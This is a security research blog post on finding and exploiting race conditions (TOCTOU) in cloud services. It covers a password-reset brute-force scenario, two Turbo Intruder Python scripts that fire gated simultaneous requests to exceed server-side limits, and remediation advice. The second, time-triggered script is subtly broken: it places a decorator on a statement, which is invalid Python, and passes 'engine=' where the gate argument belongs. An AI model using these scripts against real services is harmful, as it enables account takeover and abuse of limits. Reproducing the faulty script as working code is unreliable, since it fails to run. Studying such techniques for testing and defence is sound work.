Home  >  Research  >  Finding and Exploiting Ra…

Finding and Exploiting Race Conditions in the Cloud

Written By: Connor MacLeod

Finding and Exploiting Race Conditions in the Cloud

What Are Race Conditions?

Race conditions are a well known but rarely discovered class of vulnerability. Due to the modern landscape of highly scalable, multi-tenant cloud services, these vulnerabilities are more prevalent than ever before, but they remain largely undiscovered and undiscussed in the field of security.

A race condition is traditionally known as a “flaw that produces an unexpected result when the timing of actions impact other actions,” which is a terrifically unhelpful definition. For this article, we will be discussing a specific subset of race conditions: a race-condition that occurs when an attacker sends numerous web requests nearly simultaneously to bypass restrictions regarding creating, reading, updating, or deleting objects (also known as CRUD functions).

This technique was first brought to our attention by a security researcher and cybersecurity celebrity, James Kettle, in his article “Turbo Intruder: Embracing the billion-request attack.” Since that article was published, we have been using Turbo Intruder and developing techniques for locating and exploiting these race conditions.

In this article, we will cover the process of locating these race conditions, why these vulnerabilities are becoming more common, and how to configure Turbo Intruder to locate and exploit these vulnerabilities. Finally, we leave our suggestions for remediation (the most difficult task of this entire process).

Why These Race Conditions Are So Prevalent in the Cloud

The qualities that leave cloud services so vulnerable to race-conditions are the same qualities that make cloud services appealing: high scalability and multi-tenancy. A service that is spread across multiple regions while using a central database to handle data presents a huge attack surface. When a user performs an action that requires a database check, the time required to make that check in the cloud is significant compared to a dedicated server solution. This gap between time-of-check and time-of-use creates the space for a potential race-condition, aka a TOCTOU (time-of-check time-of-use) vulnerability. TOCTOU vulnerabilities are something we have addressed before at Security Compass. TOCTOU vulnerabilities are usually discussed regarding operating systems, but this article will focus on their rising prevalence in cloud-based services. Specifically, we will be looking at exploiting TOCTOU vulnerabilities in database operations (CRUD).

Many services will allow users to perform CRUD actions, but restrictions (the “checks” in TOCTOU) are almost always involved. These restrictions may enforce how many resources can be created with a free-tier account, ensure that a user can’t buy something that costs more than the amount of credit in their account, or enforce limits on the use of a password-reset token.

These restrictions are usually imposed by way of application code that requires a database lookup. When a user makes a request to create a resource and said resource has been capped, the back end will perform a database lookup and check to see whether the cap has been hit. The result will determine whether the request succeeds. The moment of success marks the TOCTOU “time of use.” But what if there are 50 simultaneous requests made to create a resource that is capped at ten?

How to Locate These Vulnerabilities

Let’s imagine a scenario in which a cloud service offers a password-reset function that uses a five-digit number sent to the user’s email. When submitting this five-digit code, the user can make ten attempts to enter the correct code. After ten failed attempts, the code is invalidated. The TOCTOU “check” here is the confirmation of whether ten attempts have been made, and the TOCTOU “use” is the attempt itself. 

If we assume there is a one second window between the time of the check and the time of the submission being counted as “used,” the perfect conditions for a TOCTOU vulnerability are present. If we send 100,000 simultaneous requests with all codes from 00000 to 99999, each one of those will prompt a database lookup (all at the same time) and each one will pass the check, because, according to the database, there will have been zero attempts at submission. Each of the requests will succeed, and one of them will contain the correct code and prompt the password-reset flow. And just like that, we will have brute-forced a password reset and stolen an account. In fact, this was an exploit discovered in AWS Cognito using Turbo Intruder (Password reset code brute-force vulnerability in AWS Cognito | Pentagrid AG).

So, how can we apply this understanding and convert it into indicators of when to check a request for a race-condition vulnerability? When trying to locate one of these race-conditions, it’s best to look at any requests being sent to the service and ask the following questions: 

  • Is this request performing a CRUD operation? 
  • Are there any restrictions (i.e. “checks”) related to this CRUD action? 

If the answer to both questions is “yes,” a TOCTOU vulnerability might exist. Let’s look at a situation where one of these conditions (i.e. the “check”) is not present: an online purchase with a credit card. The purchase is a CRUD operation (a new transaction is created), but there may not be any limits associated with that transaction. If an attacker were to attempt to exploit a race condition here, the result might be dozens of normal transactions that leave the attacker with a large credit card bill to pay. 

Exploitation and Turbo Intruder

Let’s say we have discovered a request that performs a CRUD action and has a restriction imposed on it that we want to bypass. How do we do that? Well, we know the answer involves the Burp Turbo Intruder tool, but let’s talk about the specifics of configuration. First, capture the request in Burp Suite, then send it to Turbo Intruder. We can start with the “race.py” template provided in the Turbo Intruder GitHub repository. Let’s break down what this configuration script does.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
 
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
 
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    engine.openGate('race1')
 
    engine.complete(timeout=60)
 
 
def handleResponse(req, interesting):
    table.add(req)

First, we define the parameters of the request engine. Doing so will determine the number of concurrent connections, the number of requests per connection, and, optionally, the HTTP stack we will use to perform the attack. For now, we only need to worry about the “concurrentConnections” parameter; set its value to a number large enough to bypass the limit imposed by the service. 

Next, let’s look at the “for” loop used to queue all the requests we are going to send. The first argument is the base request that was sent to Turbo Intruder (which you can view/edit in the top half of the Turbo Intruder window). The next argument is optional, and it is used for string substitution. We can optionally set a “%s” anywhere in the target request (again from the top window) and substitute the “%s” for a string determined by our code when the request is sent. This is useful for requests that require incrementing (like our earlier example of brute-forcing a password reset with a five-digit number). The final argument is a keyword argument called ‘gate’; this is the key to our attack. Turbo Intruder gates allow requests to be sent over time, and the gate will prevent the last byte of the request from being sent until the gate is open, allowing all the requests to be “sent” nearly simultaneously by releasing the last byte of each request.

Finally, we open the gate we set earlier, and wait for the responses to come back. Then, we can determine filters for adding responses to the results table that is displayed when our attack is done. We can leave these filters alone in most cases, which will let us see all requests and responses.

Now we can see the results and whether we found a race condition. We want to check the number of successful requests and see whether that number exceeds the service limit we are trying to bypass. Even if we can surpass it by one or two requests, doing so would be a solid indicator of a race condition. From here, we can tinker with the attack by sending more requests per connection or by using more connections to see how far we can exceed the limit and assess the impact of our finding.

Advanced Exploitation and Customizing Turbo Intruder

What if the situation is a bit more complicated? What if we need to make use of other Burp Suite extensions in combination with my Turbo Intruder attack? What if we need to send various requests to different endpoints simultaneously? Not to worry; Turbo Intruder has the capability to accommodate that.

To accommodate other Burp Suite extensions, we can swap the HTTP stack we are using in the engine configuration at the beginning of the script by adding a new keyword argument: ‘engine=BURP2’. This will tell Turbo Intruder to use the Burp HTTP/2 stack instead of the default custom HTTP/2 stack. Be warned that swapping the stack this way may cause some performance impacts and should be done with caution.

To send simultaneous requests to multiple domains or multiple endpoints, it gets a bit trickier and there are two solutions you can explore. The first is from the GitHub repository for Turbo Intruder and suggests creating multiple engines and taking advantage of Python to manage the requests. My preferred solution is one I developed that allows two separate Turbo Intruder windows to execute at the same time. By taking advantage of Python’s decorators and time library, a decorator can be constructed that will execute the function at a specific time. Using this method, we can put a decorator with the same time value on both Turbo Intruder instances and execute them. The function will not execute, and the last byte of the requests will not be sent until the time is reached. Here is an example of the “race.py” configuration from earlier with the addition of a simple decorator implementation.

# Execute Turbo Intruder attacks at a given time HH:MM
import random
import time
from datetime import datetime
 
 
def execute_at(time_str):
    def decorator(func):
        def wrapper(*args, **kwargs):
            while datetime.now().strftime("%H:%M") != time_str:
                pass
            func(*args, **kwargs)
        return wrapper
    return decorator
 
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False,
                           engine=Engine.HTTP2
                           )
 
   
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, engine='race1')
 
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    
    # CHANGE THIS TO CHANGE WHAT TIME IT EXECUTES
    @execute_at("11:30")
    engine.openGate('race1')
 
    engine.complete(timeout=900)
 
 
def handleResponse(req, interesting):
    table.add(req)

For more information on the Turbo Intruder configuration, we highly recommend James Kettle’s original article and the GitHub repository.

Remediation

The final hurdle with these race conditions is remediation. The typical recommendation for a race condition is to implement mutexes and thread locks to prevent concurrency in key areas. However, this is a very problematic solution to most cloud services. In many situations a naïve implementation of thread locks would impose massive performance decreases in the service to a degree where it may become unusable under load. In most cases, we have found that the best fix is one that utilises an array of solutions in a configuration that best fits the service, because each service is unique and poses unique challenges. The remediation is usually a combination of the following:

  • Thread locks/mutexes
  • Per-session rate limiting
  • Forced synchronization on the database
  • Implemented database isolation controls
  • A preference for inserts over updates in database operations

These techniques allow us to easily and consistently identify potentially critical security risks in modern cloud infrastructure and services. Since Turbo Intruder has become available to the public in 2019, we have seen race conditions that had previously gone undetected in popular cloud services for years. While cloud providers have been receptive and quick to patch these vulnerabilities, they must be discovered to be fixed.

You can find all of the latest technical content from Advisory Labs here.

Advisory Labs

Stay Up To Date

Get the latest cybersecurity news and updates delivered straight to your inbox.
Sign up today.